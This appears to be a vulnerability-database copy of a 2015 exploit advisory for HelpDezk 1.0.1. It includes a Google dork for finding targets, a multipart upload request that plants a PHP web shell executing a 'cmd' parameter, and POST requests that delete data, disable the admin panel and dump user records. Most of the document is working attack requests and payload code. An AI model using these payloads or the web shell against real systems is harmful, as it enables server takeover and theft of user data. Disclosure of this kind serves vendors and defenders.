Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31863
HistoryMar 23, 2015 - 12:00 a.m.

HelpDezk 1.0.1 Multiple Vulnerabilities

2015-03-2300:00:00
vulners.com
5

Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities

Google Dork: "intext: helpdezk-community-1.0.1"

Date: 26-2-2015

Exploit Author: Dennis Veninga

Vendor Homepage: http://www.helpdezk.org/

Vendor contacted: 26-2-2015

Version: 1.0.1

Tested on: Firefox 36 & Chrome 38 / W8.1-x64

HelpDezk ->
Version: 1.0.1
Type: Multiple Critical Vulnerabilities
Severity: Critical
Info Exploit: Different exploits making it possible to take over the website/server

  • Arbitrary File Upload
  • Remote Command Execution
  • User Information Disclosure

###############################################
Arbitrary File Upload, 2 ways ->

  1. Direct Access:
    http://{target}/helpdezk/admin/logos/upload
    #########

  2. POST: http://localhost/helpdezk/admin/logos/upload
    After posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoami

CONTENT:
-----------------------------14463264629720\r\n
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\r\n
if(isset($_REQUEST['cmd'])){\r\n
$cmd = ($_REQUEST["cmd"]);\r\n
system($cmd);\r\n
echo "</pre>$cmd<pre>";\r\n
die;\r\n
}\r\n
?>\r\n
-----------------------------14463264629720–\r\n

###############################################
Remote Command Execution, you see an white page with 'ok' when SUCCESS!

Delete a download
POST: http://localhost/helpdezk/admin/downloads/delete
CONTENT: id={IDNUMBER}

Deactivate admin panel: use /activate and id={IDNUMBER} to activate again
POST: http://{localhost}/helpdezk/admin/modules/deactivate
CONTENT: id=1

id=1 = Admin
id=2 = Dashboard
id=3 = HelpDezk
###############################################
User Information Disclosure
NOTE: Stop javascript, else it will quickly show all info and returns you to the login page.

POST: http://{target}/helpdezk/admin/relPessoa/table_json/
CONTENT: typeperson=ALL
###############################################

I'm sure I didn't find everything, but maybe time to fix those huge issues first!